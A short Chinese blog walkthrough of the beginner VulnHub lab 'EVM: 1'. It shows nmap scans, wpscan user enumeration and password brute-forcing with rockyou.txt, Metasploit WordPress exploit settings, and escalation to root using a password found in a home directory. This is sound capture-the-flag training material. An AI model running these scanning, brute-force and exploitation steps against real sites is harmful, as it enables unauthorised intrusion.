EVM: 1

靶机地址:https://www.vulnhub.com/entry/evm-1,391/

靶机难度:初级

 

nmap扫描获取靶机ip:192.168.40.138

 nmap -sP 192.168.40.*

 获取靶机开放的端口,开放了挺多端口

nmap -sV -p- -P0  192.168.40.138

 先访问80端口,页面提示网站是wordpress,用dirb也扫出wordpress的文件

 既然是wordpress,就用wpscan尝试扫描用户

wpscan --url http://192.168.40.138/wordpress/ -eu

成功扫描出一个用户 c0rrupt3d_brain

 然后爆破出该用户密码24992499

wpscan --url http://192.168.40.138/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

 有了账号密码就可以配合msf内置的wordpress漏洞

 设置参数

set rhosts 192.168.40.138
set username  c0rrupt3d_brain
set password 24992499
set targeturi /wordpress
run

 在/home/root3r下面找到root的密码 willy26

 

 用python获取交互式tty在su root 成功登入root用户

 

posted @ 2020-10-18 09:24  高诺琪  阅读(125)  评论(0编辑  收藏  举报